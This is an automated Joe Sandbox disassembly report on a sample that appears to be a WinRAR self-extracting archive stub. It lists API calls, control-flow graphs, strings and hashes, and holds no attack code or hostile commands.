                                                              • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0050D5E1
                                                              • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,000000C2,00000000,005243F4), ref: 0050D5F0
                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0050BA68
                                                            • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0050BA90
                                                            • GetTickCount.KERNEL32 ref: 0050BAAE
                                                            • _swprintf.LIBCMT ref: 0050BAC2
                                                            • GetLastError.KERNEL32(?,00000011), ref: 0050BAF4
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0050BB43
                                                            • _swprintf.LIBCMT ref: 0050BB7C
                                                            • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0050BBD0
                                                            • GetCommandLineW.KERNEL32 ref: 0050BBEA
                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0050BC47
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 0050BC6F
                                                            • Sleep.KERNEL32(00000064), ref: 0050BCB9
                                                            • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0050BCE2
                                                            • CloseHandle.KERNEL32(00000000), ref: 0050BCEB
                                                            • _swprintf.LIBCMT ref: 0050BD1E
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0050BD7D
                                                            • SetDlgItemTextW.USER32(?,00000065,005235F4), ref: 0050BD94
                                                            • GetDlgItem.USER32(?,00000065), ref: 0050BD9D
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0050BDAC
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0050BDBB
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0050BE68
                                                            • _wcslen.LIBCMT ref: 0050BEBE
                                                            • _swprintf.LIBCMT ref: 0050BEE8
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 0050BF32
                                                            • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0050BF4C
                                                            • GetDlgItem.USER32(?,00000068), ref: 0050BF55
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0050BF6B
                                                            • GetDlgItem.USER32(?,00000066), ref: 0050BF85
                                                            • SetWindowTextW.USER32(00000000,0053A472), ref: 0050BFA7
                                                            • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0050C007
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0050C01A
                                                            • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0050C0BD
                                                            • EnableWindow.USER32(00000000,00000000), ref: 0050C197
                                                            • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0050C1D9
                                                              • Part of subcall function 0050C73F: __EH_prolog.LIBCMT ref: 0050C744
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0050C1FD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                            • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDu<P$STARTDLG$^P$__tmp_rar_sfx_access_check_%u$hP$winrarsfxmappingfile.tmp$QR
                                                            • API String ID: 3829768659-1951401641
                                                            • Opcode ID: 6bf1375cc4959603f7302e65e10034717672873fb4f0f1bbbfc8555ef765cb9a
                                                            • Instruction ID: 94db0e6e9d0a0cffe48a28a0f0cde039ccc5b096f5dfcec76c316acbe6c194cb
                                                            • Opcode Fuzzy Hash: 6bf1375cc4959603f7302e65e10034717672873fb4f0f1bbbfc8555ef765cb9a
                                                            • Instruction Fuzzy Hash: E542E670944349BAFB219BB09C8EFBE3F6CBB22704F000155F644A61E2CB795E48DB25

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 269 500863-500886 call 50ec50 GetModuleHandleW 272 5008e7-500b48 269->272 273 500888-50089f GetProcAddress 269->273 274 500c14-500c40 GetModuleFileNameW call 4fc29a call 500602 272->274 275 500b4e-500b59 call 5175fb 272->275 276 5008a1-5008b7 273->276 277 5008b9-5008c9 GetProcAddress 273->277 291 500c42-500c4e call 4fb146 274->291 275->274 286 500b5f-500b8d GetModuleFileNameW CreateFileW 275->286 276->277 279 5008e5 277->279 280 5008cb-5008e0 277->280 279->272 280->279 289 500c08-500c0f CloseHandle 286->289 290 500b8f-500b9b SetFilePointer 286->290 289->274 290->289 292 500b9d-500bb9 ReadFile 290->292 298 500c50-500c5b call 50081b 291->298 299 500c7d-500ca4 call 4fc310 GetFileAttributesW 291->299 292->289 295 500bbb-500be0 292->295 297 500bfd-500c06 call 500371 295->297 297->289 306 500be2-500bfc call 50081b 297->306 298->299 308 500c5d-500c7b CompareStringW 298->308 309 500ca6-500caa 299->309 310 500cae 299->310 306->297 308->299 308->309 309->291 313 500cac 309->313 311 500cb0-500cb5 310->311 314 500cb7 311->314 315 500cec-500cee 311->315 313->311 316 500cb9-500ce0 call 4fc310 GetFileAttributesW 314->316 317 500cf4-500d0b call 4fc2e4 call 4fb146 315->317 318 500dfb-500e05 315->318 323 500ce2-500ce6 316->323 324 500cea 316->324 328 500d73-500da6 call 4f4092 AllocConsole 317->328 329 500d0d-500d6e call 50081b * 2 call 4fe617 call 4f4092 call 4fe617 call 50a7e4 317->329 323->316 326 500ce8 323->326 324->315 326->315 335 500df3-500df5 ExitProcess 328->335 336 500da8-500ded GetCurrentProcessId AttachConsole call 513e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->336 329->335 336->335
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32), ref: 0050087C
                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0050088E
                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 005008BF
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00500B69
                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00500B83
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00500B93
                                                            • ReadFile.KERNEL32(00000000,?,00007FFE,|<R,00000000), ref: 00500BB1
                                                            • CloseHandle.KERNEL32(00000000), ref: 00500C09
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00500C1E
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<R,?,00000000,?,00000800), ref: 00500C72
                                                            • GetFileAttributesW.KERNELBASE(?,?,|<R,00000800,?,00000000,?,00000800), ref: 00500C9C
                                                            • GetFileAttributesW.KERNEL32(?,?,D=R,00000800), ref: 00500CD8
                                                              • Part of subcall function 0050081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00500836
                                                              • Part of subcall function 0050081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004FF2D8,Crypt32.dll,00000000,004FF35C,?,?,004FF33E,?,?,?), ref: 00500858
                                                            • _swprintf.LIBCMT ref: 00500D4A
                                                            • _swprintf.LIBCMT ref: 00500D96
                                                              • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                                            • AllocConsole.KERNEL32 ref: 00500D9E
                                                            • GetCurrentProcessId.KERNEL32 ref: 00500DA8
                                                            • AttachConsole.KERNEL32(00000000), ref: 00500DAF
                                                            • _wcslen.LIBCMT ref: 00500DC4
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00500DD5
                                                            • WriteConsoleW.KERNEL32(00000000), ref: 00500DDC
                                                            • Sleep.KERNEL32(00002710), ref: 00500DE7
                                                            • FreeConsole.KERNEL32 ref: 00500DED
                                                            • ExitProcess.KERNEL32 ref: 00500DF5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                            • String ID: (=R$,<R$,@R$0?R$0AR$4BR$8>R$D=R$DXGIDebug.dll$H?R$H@R$HAR$P>R$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=R$`@R$d?R$dAR$dwmapi.dll$h=R$h>R$kernel32$uxtheme.dll$|<R$|?R$|@R$<R$>R$?R$@R$AR
                                                            • API String ID: 1207345701-4249690961
                                                            • Opcode ID: 12dc977b2e28439fa8435bfaa83053bdf3715120ed162ee5ee0cd6954cb5948a
                                                            • Instruction ID: ea604e2d52b9acb2c13dda6c019fedaa3ed738a6be72b6a33fe87391f8c7c9bd
                                                            • Opcode Fuzzy Hash: 12dc977b2e28439fa8435bfaa83053bdf3715120ed162ee5ee0cd6954cb5948a
                                                            • Instruction Fuzzy Hash: 54D160B1108394ABD3309F50E94DB9FBEE8BF86704F50491DF289961D0DB788A49CF62

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 348 50c73f-50c757 call 50eb78 call 50ec50 353 50d40d-50d418 348->353 354 50c75d-50c787 call 50b314 348->354 354->353 357 50c78d-50c792 354->357 358 50c793-50c7a1 357->358 359 50c7a2-50c7b7 call 50af98 358->359 362 50c7b9 359->362 363 50c7bb-50c7d0 call 501fbb 362->363 366 50c7d2-50c7d6 363->366 367 50c7dd-50c7e0 363->367 366->363 368 50c7d8 366->368 369 50c7e6 367->369 370 50d3d9-50d404 call 50b314 367->370 368->370 371 50ca7c-50ca7e 369->371 372 50c7ed-50c7f0 369->372 373 50c9be-50c9c0 369->373 374 50ca5f-50ca61 369->374 370->358 385 50d40a-50d40c 370->385 371->370 377 50ca84-50ca8b 371->377 372->370 379 50c7f6-50c850 call 50a64d call 4fbdf3 call 4fa544 call 4fa67e call 4f6edb 372->379 373->370 378 50c9c6-50c9d2 373->378 374->370 376 50ca67-50ca77 SetWindowTextW 374->376 376->370 377->370 381 50ca91-50caaa 377->381 382 50c9d4-50c9e5 call 517686 378->382 383 50c9e6-50c9eb 378->383 434 50c98f-50c9a4 call 4fa5d1 379->434 386 50cab2-50cac0 call 513e13 381->386 387 50caac 381->387 382->383 390 50c9f5-50ca00 call 50b48e 383->390 391 50c9ed-50c9f3 383->391 385->353 386->370 404 50cac6-50cacf 386->404 387->386 395 50ca05-50ca07 390->395 391->395 400 50ca12-50ca32 call 513e13 call 513e3e 395->400 401 50ca09-50ca10 call 513e13 395->401 422 50ca34-50ca3b 400->422 423 50ca4b-50ca4d 400->423 401->400 408 50cad1-50cad5 404->408 409 50caf8-50cafb 404->409 412 50cb01-50cb04 408->412 414 50cad7-50cadf 408->414 411 50cbe0-50cbee call 500602 409->411 409->412 432 50cbf0-50cc04 call 51279b 411->432 416 50cb11-50cb2c 412->416 417 50cb06-50cb0b 412->417 414->370 420 50cae5-50caf3 call 500602 414->420 435 50cb76-50cb7d 416->435 436 50cb2e-50cb68 416->436 417->411 417->416 420->432 429 50ca42-50ca4a call 517686 422->429 430 50ca3d-50ca3f 422->430 423->370 431 50ca53-50ca5a call 513e2e 423->431 429->423 430->429 431->370 447 50cc11-50cc62 call 500602 call 50b1be GetDlgItem SetWindowTextW SendMessageW call 513e49 432->447 448 50cc06-50cc0a 432->448 452 50c855-50c869 SetFileAttributesW 434->452 453 50c9aa-50c9b9 call 4fa55a 434->453 441 50cbab-50cbce call 513e13 * 2 435->441 442 50cb7f-50cb97 call 513e13 435->442 471 50cb6a 436->471 472 50cb6c-50cb6e 436->472 441->432 476 50cbd0-50cbde call 5005da 441->476 442->441 458 50cb99-50cba6 call 5005da 442->458 482 50cc67-50cc6b 447->482 448->447 454 50cc0c-50cc0e 448->454 459 50c90f-50c91f GetFileAttributesW 452->459 460 50c86f-50c8a2 call 4fb991 call 4fb690 call 513e13 452->460 453->370 454->447 458->441 459->434 469 50c921-50c930 DeleteFileW 459->469 491 50c8a4-50c8b3 call 513e13 460->491 492 50c8b5-50c8c3 call 4fbdb4 460->492 469->434 475 50c932-50c935 469->475 471->472 472->435 479 50c939-50c965 call 4f4092 GetFileAttributesW 475->479 476->432 489 50c937-50c938 479->489 490 50c967-50c97d MoveFileW 479->490 482->370 486 50cc71-50cc85 SendMessageW 482->486 486->370 489->479 490->434 493 50c97f-50c989 MoveFileExW 490->493 491->492 498 50c8c9-50c908 call 513e13 call 50fff0 491->498 492->453 492->498 493->434 498->459
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0050C744
                                                              • Part of subcall function 0050B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0050B3FB
                                                              • Part of subcall function 0050AF98: _wcschr.LIBVCRUNTIME ref: 0050B033
                                                            • _wcslen.LIBCMT ref: 0050CA0A
                                                            • _wcslen.LIBCMT ref: 0050CA13
                                                            • SetWindowTextW.USER32(?,?), ref: 0050CA71
                                                            • _wcslen.LIBCMT ref: 0050CAB3
                                                            • _wcsrchr.LIBVCRUNTIME ref: 0050CBFB
                                                            • GetDlgItem.USER32(?,00000066), ref: 0050CC36
                                                            • SetWindowTextW.USER32(00000000,?), ref: 0050CC46
                                                            • SendMessageW.USER32(00000000,00000143,00000000,0053A472), ref: 0050CC54
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0050CC7F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                            • String ID: %s.%d.tmp$<br>$<P$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$P
                                                            • API String ID: 986293930-2014984662
                                                            • Opcode ID: 5afed6db326bc0fef2383a77176118c3d52c43ebfa37d1c7500737aea993366c
                                                            • Instruction ID: 535dea0b03490816b3da9c625ad2c79353d73512c1f5388b0e8cd466472a4505
                                                            • Opcode Fuzzy Hash: 5afed6db326bc0fef2383a77176118c3d52c43ebfa37d1c7500737aea993366c
                                                            • Instruction Fuzzy Hash: 13E17972900219AADF24DBA4DC85EEE7BBCBF45350F4445A5F609E7090EB749F848F60
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 004FDA70
                                                            • _wcschr.LIBVCRUNTIME ref: 004FDA91
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 004FDAAC
                                                              • Part of subcall function 004FC29A: _wcslen.LIBCMT ref: 004FC2A2
                                                              • Part of subcall function 005005DA: _wcslen.LIBCMT ref: 005005E0
                                                              • Part of subcall function 00501B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,004FBAE9,00000000,?,?,?,00010424), ref: 00501BA0
                                                            • _wcslen.LIBCMT ref: 004FDDE9
                                                            • __fprintf_l.LIBCMT ref: 004FDF1C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                            • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9R
                                                            • API String ID: 557298264-972840142
                                                            • Opcode ID: ad9fdd03811b0d4f744f5b5ccc33dd76b809f63db02d5c4efb65bead54164ee7
                                                            • Instruction ID: fc5b2181501d061cb81f69956ff862f253c783fce73fbb14dc474d9600f5c338
                                                            • Opcode Fuzzy Hash: ad9fdd03811b0d4f744f5b5ccc33dd76b809f63db02d5c4efb65bead54164ee7
                                                            • Instruction Fuzzy Hash: B732F07190021DABDB24EF69C845BFE7BA5FF45300F00016BFA0597291EBB99D85CB58

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 0050B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0050B579
                                                              • Part of subcall function 0050B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0050B58A
                                                              • Part of subcall function 0050B568: IsDialogMessageW.USER32(00010424,?), ref: 0050B59E
                                                              • Part of subcall function 0050B568: TranslateMessage.USER32(?), ref: 0050B5AC
                                                              • Part of subcall function 0050B568: DispatchMessageW.USER32(?), ref: 0050B5B6
                                                            • GetDlgItem.USER32(00000068,0054FCB8), ref: 0050D4E8
                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,0050AF07,00000001,?,?,0050B7B9,0052506C,0054FCB8,0054FCB8,00001000,00000000,00000000), ref: 0050D510
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0050D51B
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,005235F4), ref: 0050D529
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0050D53F
                                                            • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0050D559
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0050D59D
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0050D5AB
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0050D5BA
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0050D5E1
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,005243F4), ref: 0050D5F0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                            • String ID: \
                                                            • API String ID: 3569833718-2967466578
                                                            • Opcode ID: a3c6b9a47e0b2c2e1e8ba3408e70191c6499cd1f335076b54c77616e6a25e14d
                                                            • Instruction ID: 25e6efa4aa6eaf14944ff231f04f83cb917f70e59cf08673dea4b69fc4c03b36
                                                            • Opcode Fuzzy Hash: a3c6b9a47e0b2c2e1e8ba3408e70191c6499cd1f335076b54c77616e6a25e14d
                                                            • Instruction Fuzzy Hash: A231E171145742ABE301DF20EC5AFAF7FACEBA2359F000508F555962E0EB648B089B76

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 838 50d78f-50d7a7 call 50ec50 841 50d9e8-50d9f0 838->841 842 50d7ad-50d7b9 call 513e13 838->842 842->841 845 50d7bf-50d7e7 call 50fff0 842->845 848 50d7f1-50d7ff 845->848 849 50d7e9 845->849 850 50d801-50d804 848->850 851 50d812-50d818 848->851 849->848 852 50d808-50d80e 850->852 853 50d85b-50d85e 851->853 855 50d810 852->855 856 50d837-50d844 852->856 853->852 854 50d860-50d866 853->854 859 50d868-50d86b 854->859 860 50d86d-50d86f 854->860 861 50d822-50d82c 855->861 857 50d9c0-50d9c2 856->857 858 50d84a-50d84e 856->858 863 50d9c6 857->863 862 50d854-50d859 858->862 858->863 859->860 864 50d882-50d898 call 4fb92d 859->864 860->864 865 50d871-50d878 860->865 866 50d81a-50d820 861->866 867 50d82e 861->867 862->853 871 50d9cf 863->871 874 50d8b1-50d8bc call 4fa231 864->874 875 50d89a-50d8a7 call 501fbb 864->875 865->864 868 50d87a 865->868 866->861 870 50d830-50d833 866->870 867->856 868->864 870->856 873 50d9d6-50d9d8 871->873 877 50d9e7 873->877 878 50d9da-50d9dc 873->878 884 50d8d9-50d8dd 874->884 885 50d8be-50d8d5 call 4fb6c4 874->885 875->874 883 50d8a9 875->883 877->841 878->877 881 50d9de-50d9e1 ShowWindow 878->881 881->877 883->874 888 50d8e4-50d8e6 884->888 885->884 888->877 889 50d8ec-50d8f9 888->889 890 50d8fb-50d902 889->890 891 50d90c-50d90e 889->891 890->891 892 50d904-50d90a 890->892 893 50d910-50d919 891->893 894 50d925-50d944 call 50dc3b 891->894 892->891 895 50d97b-50d987 CloseHandle 892->895 893->894 900 50d91b-50d923 ShowWindow 893->900 894->895 908 50d946-50d94e 894->908 898 50d998-50d9a6 895->898 899 50d989-50d996 call 501fbb 895->899 898->873 901 50d9a8-50d9aa 898->901 899->871 899->898 900->894 901->873 904 50d9ac-50d9b2 901->904 904->873 907 50d9b4-50d9be 904->907 907->873 908->895 909 50d950-50d961 GetExitCodeProcess 908->909 909->895 910 50d963-50d96d 909->910 911 50d974 910->911 912 50d96f 910->912 911->895 912->911
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 0050D7AE
                                                            • ShellExecuteExW.SHELL32(?), ref: 0050D8DE
                                                            • ShowWindow.USER32(?,00000000), ref: 0050D91D
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 0050D959
                                                            • CloseHandle.KERNEL32(?), ref: 0050D97F
                                                            • ShowWindow.USER32(?,00000001), ref: 0050D9E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                            • String ID: .exe$.inf$PDu<P$hP$rP
                                                            • API String ID: 36480843-38795154
                                                            • Opcode ID: e9d31cc42f94adb541c5fd6ba48ffc9eb11429a6aa78e9d2c7339d3e31282889
                                                            • Instruction ID: 68e979a31c28d322696c044b69f1b73f39b26b529d852479b268dc040682d4db
                                                            • Opcode Fuzzy Hash: e9d31cc42f94adb541c5fd6ba48ffc9eb11429a6aa78e9d2c7339d3e31282889
                                                            • Instruction Fuzzy Hash: C151CE744083849AEB309BA49844BAFBFF4BF92744F04481EF9C4971E1E7718988DB72

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 913 51a95b-51a974 914 51a976-51a986 call 51ef4c 913->914 915 51a98a-51a98f 913->915 914->915 925 51a988 914->925 917 51a991-51a999 915->917 918 51a99c-51a9c0 MultiByteToWideChar 915->918 917->918 920 51ab53-51ab66 call 50fbbc 918->920 921 51a9c6-51a9d2 918->921 922 51a9d4-51a9e5 921->922 923 51aa26 921->923 926 51aa04-51aa15 call 518e06 922->926 927 51a9e7-51a9f6 call 522010 922->927 929 51aa28-51aa2a 923->929 925->915 933 51ab48 926->933 939 51aa1b 926->939 927->933 938 51a9fc-51aa02 927->938 932 51aa30-51aa43 MultiByteToWideChar 929->932 929->933 932->933 936 51aa49-51aa5b call 51af6c 932->936 937 51ab4a-51ab51 call 51abc3 933->937 944 51aa60-51aa64 936->944 937->920 943 51aa21-51aa24 938->943 939->943 943->929 944->933 945 51aa6a-51aa71 944->945 946 51aa73-51aa78 945->946 947 51aaab-51aab7 945->947 946->937 948 51aa7e-51aa80 946->948 949 51ab03 947->949 950 51aab9-51aaca 947->950 948->933 951 51aa86-51aaa0 call 51af6c 948->951 952 51ab05-51ab07 949->952 953 51aae5-51aaf6 call 518e06 950->953 954 51aacc-51aadb call 522010 950->954 951->937 966 51aaa6 951->966 956 51ab41-51ab47 call 51abc3 952->956 957 51ab09-51ab22 call 51af6c 952->957 953->956 965 51aaf8 953->965 954->956 969 51aadd-51aae3 954->969 956->933 957->956 971 51ab24-51ab2b 957->971 970 51aafe-51ab01 965->970 966->933 969->970 970->952 972 51ab67-51ab6d 971->972 973 51ab2d-51ab2e 971->973 974 51ab2f-51ab3f WideCharToMultiByte 972->974 973->974 974->956 975 51ab6f-51ab76 call 51abc3 974->975 975->937
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00515695,00515695,?,?,?,0051ABAC,00000001,00000001,2DE85006), ref: 0051A9B5
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0051ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0051AA3B
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0051AB35
                                                            • __freea.LIBCMT ref: 0051AB42
                                                              • Part of subcall function 00518E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0051CA2C,00000000,?,00516CBE,?,00000008,?,005191E0,?,?,?), ref: 00518E38
                                                            • __freea.LIBCMT ref: 0051AB4B
                                                            • __freea.LIBCMT ref: 0051AB70
                                                            Memory Dump Source
